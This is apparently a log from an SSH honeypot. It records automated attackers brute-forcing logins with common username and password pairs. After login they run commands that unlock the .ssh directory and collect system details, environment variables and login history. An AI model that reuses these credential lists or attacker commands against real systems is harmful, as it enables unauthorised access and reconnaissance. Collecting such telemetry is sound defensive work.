{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:35:42.977741Z","src_ip":"212.227.235.229","session":"0349e11678f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:35:43.224045Z","src_ip":"212.227.235.229","session":"0349e11678f9"}
{"eventid":"cowrie.login.success","username":"root","password":"sS123456","message":"login attempt [root/sS123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:35:44.219573Z","src_ip":"212.227.235.229","session":"0349e11678f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:35:44.735725Z","src_ip":"212.227.235.229","session":"0349e11678f9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:35:44.736451Z","src_ip":"212.227.235.229","session":"0349e11678f9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:35:44.737308Z","src_ip":"212.227.235.229","session":"0349e11678f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:35:44.987055Z","src_ip":"212.227.235.229","session":"0349e11678f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56332,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce7a44eb139d","protocol":"ssh","message":"New connection: 212.227.235.229:56332 (1.2.3.4:22) [session: ce7a44eb139d]","sensor":"my-vps","timestamp":"2025-08-26T20:35:51.234398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:35:51.240286Z","src_ip":"212.227.235.229","session":"ce7a44eb139d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:35:51.484822Z","src_ip":"212.227.235.229","session":"ce7a44eb139d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T20:35:52.482013Z","src_ip":"212.227.235.229","session":"ce7a44eb139d"}
{"eventid":"cowrie.session.closed","duration":13.564483165740967,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:35:52.795042Z","src_ip":"212.227.125.160","session":"266fe721f501"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:36:35.290454Z","src_ip":"212.227.235.229","session":"a68528a8a4f7"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":8241,"dst_ip":"1.2.3.4","dst_port":22,"session":"57cd341ce206","protocol":"ssh","message":"New connection: 213.108.243.7:8241 (1.2.3.4:22) [session: 57cd341ce206]","sensor":"my-vps","timestamp":"2025-08-26T20:36:46.940100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:36:46.985810Z","src_ip":"213.108.243.7","session":"57cd341ce206"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:36:47.082920Z","src_ip":"213.108.243.7","session":"57cd341ce206"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R","message":"login attempt [root/1q@W3e$R] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:36:47.505551Z","src_ip":"213.108.243.7","session":"57cd341ce206"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:36:47.866533Z","src_ip":"213.108.243.7","session":"57cd341ce206"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-26T20:36:47.867389Z","src_ip":"213.108.243.7","session":"57cd341ce206"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:36:48.120177Z","src_ip":"213.108.243.7","session":"57cd341ce206"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:36:48.245357Z","src_ip":"213.108.243.7","session":"57cd341ce206"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63285,"dst_ip":"1.2.3.4","dst_port":22,"session":"e23b81186b92","protocol":"ssh","message":"New connection: 212.227.125.160:63285 (1.2.3.4:22) [session: e23b81186b92]","sensor":"my-vps","timestamp":"2025-08-26T20:36:52.330424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T20:36:52.331408Z","src_ip":"212.227.125.160","session":"e23b81186b92"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T20:36:52.424095Z","src_ip":"212.227.125.160","session":"e23b81186b92"}
{"eventid":"cowrie.login.failed","username":"user","password":"polo","message":"login attempt [user/polo] failed","sensor":"my-vps","timestamp":"2025-08-26T20:36:52.877353Z","src_ip":"212.227.125.160","session":"e23b81186b92"}
{"eventid":"cowrie.login.failed","username":"user","password":"oblivion","message":"login attempt [user/oblivion] failed","sensor":"my-vps","timestamp":"2025-08-26T20:36:53.998006Z","src_ip":"212.227.125.160","session":"e23b81186b92"}
{"eventid":"cowrie.login.failed","username":"user","password":"mustangs","message":"login attempt [user/mustangs] failed","sensor":"my-vps","timestamp":"2025-08-26T20:36:55.118443Z","src_ip":"212.227.125.160","session":"e23b81186b92"}
{"eventid":"cowrie.login.failed","username":"user","password":"margarita","message":"login attempt [user/margarita] failed","sensor":"my-vps","timestamp":"2025-08-26T20:36:56.243850Z","src_ip":"212.227.125.160","session":"e23b81186b92"}
{"eventid":"cowrie.login.failed","username":"user","password":"letsgo","message":"login attempt [user/letsgo] failed","sensor":"my-vps","timestamp":"2025-08-26T20:36:57.364719Z","src_ip":"212.227.125.160","session":"e23b81186b92"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:36:58.485468Z","src_ip":"212.227.125.160","session":"e23b81186b92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62318,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a12e2b54dcf","protocol":"ssh","message":"New connection: 212.227.125.160:62318 (1.2.3.4:22) [session: 7a12e2b54dcf]","sensor":"my-vps","timestamp":"2025-08-26T20:37:11.274177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T20:37:11.275280Z","src_ip":"212.227.125.160","session":"7a12e2b54dcf"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T20:37:11.360662Z","src_ip":"212.227.125.160","session":"7a12e2b54dcf"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane","message":"login attempt [dane/dane] failed","sensor":"my-vps","timestamp":"2025-08-26T20:37:11.788444Z","src_ip":"212.227.125.160","session":"7a12e2b54dcf"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane1","message":"login attempt [dane/dane1] failed","sensor":"my-vps","timestamp":"2025-08-26T20:37:12.876080Z","src_ip":"212.227.125.160","session":"7a12e2b54dcf"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane123","message":"login attempt [dane/dane123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:37:13.962968Z","src_ip":"212.227.125.160","session":"7a12e2b54dcf"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane1234","message":"login attempt [dane/dane1234] failed","sensor":"my-vps","timestamp":"2025-08-26T20:37:15.058264Z","src_ip":"212.227.125.160","session":"7a12e2b54dcf"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane12345","message":"login attempt [dane/dane12345] failed","sensor":"my-vps","timestamp":"2025-08-26T20:37:16.148489Z","src_ip":"212.227.125.160","session":"7a12e2b54dcf"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:37:17.236984Z","src_ip":"212.227.125.160","session":"7a12e2b54dcf"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:37:51.239806Z","src_ip":"212.227.235.229","session":"ce7a44eb139d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45194,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c0b0ec01806","protocol":"ssh","message":"New connection: 212.227.235.229:45194 (1.2.3.4:22) [session: 1c0b0ec01806]","sensor":"my-vps","timestamp":"2025-08-26T20:37:54.053355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:37:55.276115Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:37:57.247408Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:38:02.163167Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:38:05.056365Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.057172Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.057869Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.058822Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.060217Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.061080Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.061899Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.062964Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.063559Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.064082Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.064505Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.065054Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:38:05.065490Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:38:06.336594Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:38:06.337510Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:38:06.338503Z","src_ip":"212.227.235.229","session":"1c0b0ec01806"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9969,"dst_ip":"1.2.3.4","dst_port":22,"session":"f363b16a6559","protocol":"ssh","message":"New connection: 212.227.235.229:9969 (1.2.3.4:22) [session: f363b16a6559]","sensor":"my-vps","timestamp":"2025-08-26T20:38:54.305727Z"}
